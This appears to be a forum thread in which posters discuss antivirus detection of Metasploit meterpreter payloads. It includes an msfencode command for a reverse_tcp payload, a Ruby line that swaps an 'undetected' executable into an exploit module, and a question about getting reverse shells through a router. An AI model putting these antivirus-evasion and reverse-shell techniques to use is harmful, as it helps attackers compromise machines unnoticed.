-
Meterpreter exe's now detected
Good or bad news depending on who cares, but the meterpreter reverse_tcp payload embedded in an exe, or as shellcode within another exe, is now detected:
VirusTotal. MD5: c32f921f597c7f82f4b48a7604b6d860 - Trojan Horse, Trojan.Vilsel.omg, Trojan:W32/Rozena.gen!A
Also, this was created with no encoders, although I don't think they would help.
-
Meterpreter
It is still possible to compile a relatively undetected copy of meterpreter using msfencode. The one I have is only being flagged by 2 on VirusTotal right now (Microsoft, Trojan:Win32/Swrort.A & Symantec, Suspicious.Insight).
However, my question to anyone out there is this:
How can I specify to use my custom meterpreter as a payload for an exploit in Metasploit?
For example, I was testing the java_signed_applet module today and the executable that is run from the jar file kept flagging A/V. I would like to specify my own version of meterpreter instead that does not get flagged.
I have searched for an answer and tried variations of the following:
set PAYLOAD windows/meterpreter/reverse_tcp LHOST xx LPORT xx R | msfencode xx xx xx xx
but of course it doesn't like that value as the actual PAYLOAD. Any help would be appreciated.
-
To accomplish what I was asking in the post above, here is a workaround by editing the actual ruby file:
data = open("path/filename", "rb") {|io| io.read}
where filename is the copy of the undetected meterpreter executable and, most frequently, data is the payload variable.
-
Hey collins.fax,
Hello, I saw your post talking about meterpreter detection. Man, I would appreciate it if you'd tell me the commands of msfencode that you used to get only 2 AVs detecting at VirusTotal. Thanks.
-
Hi Fellaz,
I've successfully exploited various Win XP machines on my LAN in a lab environment using SET and the Aurora exploit, but that is locally. How can these exploits be used against the other side of the router on MY remote office PCs (i.e. I want to try and pentest outside the local LAN)? Will the exploit meterpreter session come back to me on my LHOST 192.168.0.8 address even if not on the same LAN? If not, how can it be achieved?
Pentest office: attack machine IP 192.168.0.8, public IP 96.xx.xx.xx
Remote office, different LAN: victim IP 192.168.1.9, public IP 92.xx.xx.xx
MY OWN, btw; both victim machines are owned by myself.
Both IP addresses differ, 92.xx.xx.xx and 96.xx.xx.xx, so how do I metasploit past my remote router into the LAN side?
As stated, I own both networks, but not pwned yet.
Googled and not found a thing apart from changing LHOST to the public IP, but that's just the router, isn't it?
Kind Regards, DEE